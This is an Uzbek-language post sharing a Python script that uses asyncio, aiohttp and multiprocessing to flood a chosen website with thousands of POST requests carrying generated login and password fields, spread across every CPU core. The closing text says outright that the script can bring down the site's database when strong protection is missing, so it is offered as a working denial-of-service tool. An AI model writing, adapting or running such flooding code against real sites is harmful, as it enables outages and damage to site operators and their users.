Python orqali berilgan web saytga juda ham ko'p so'rovlar yuborish
import aiohttp import asyncio import multiprocessing url = "" async def send_request(session, data, user_agent): form_data = aiohttp.FormData() headers = {'User-Agent': user_agent} for key, value in data.items(): form_data.add_field(key, value) try: async with session.post(url, data=form_data, headers=headers) as response: if response.status > 199 and response.status < 300: print(await response.json()) else: print(f"Error: {response.status}") except: pass async def send_request_batch(start_index, end_index): async with aiohttp.ClientSession() as session: tasks = [] for i in range(start_index, end_index): login = f'User {i + 1}' password = f'password{(i):02d}' task = send_request(session, {"login": login, 'password': password}, user_agent='Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36' + login + password) tasks.append(task) await asyncio.gather(*tasks) def main(total_request_count=100): num_processes = multiprocessing.cpu_count() request_per_process = total_request_count // num_processes processes = [] for i in range(num_processes): start_index = i * request_per_process end_index = start_index + request_per_process if i < num_processes - 1 else total_request_count p = multiprocessing.Process(target=asyncio.run, args=(send_request_batch(start_index, end_index),)) processes.append(p) p.start() for p in processes: p.join() if __name__ == "__main__": main(5000)
Ushbu kodda berilgan web saytga juda ko'p so'rovlar yuborib hatto uning ma'lumotlar bazasini ishdan chiqarishi mumkin. Agar kuchli himoya yoqilmagan bo'lsa. Bu yerda qurilmadagi har bitta CPU va assinxron so'rov usulidan foydalanish orqali maksimal tezlikka erishish mumkin. Keyin esa barchasi qurilma va internet tezligiga bog'liq bo'lib qoladi.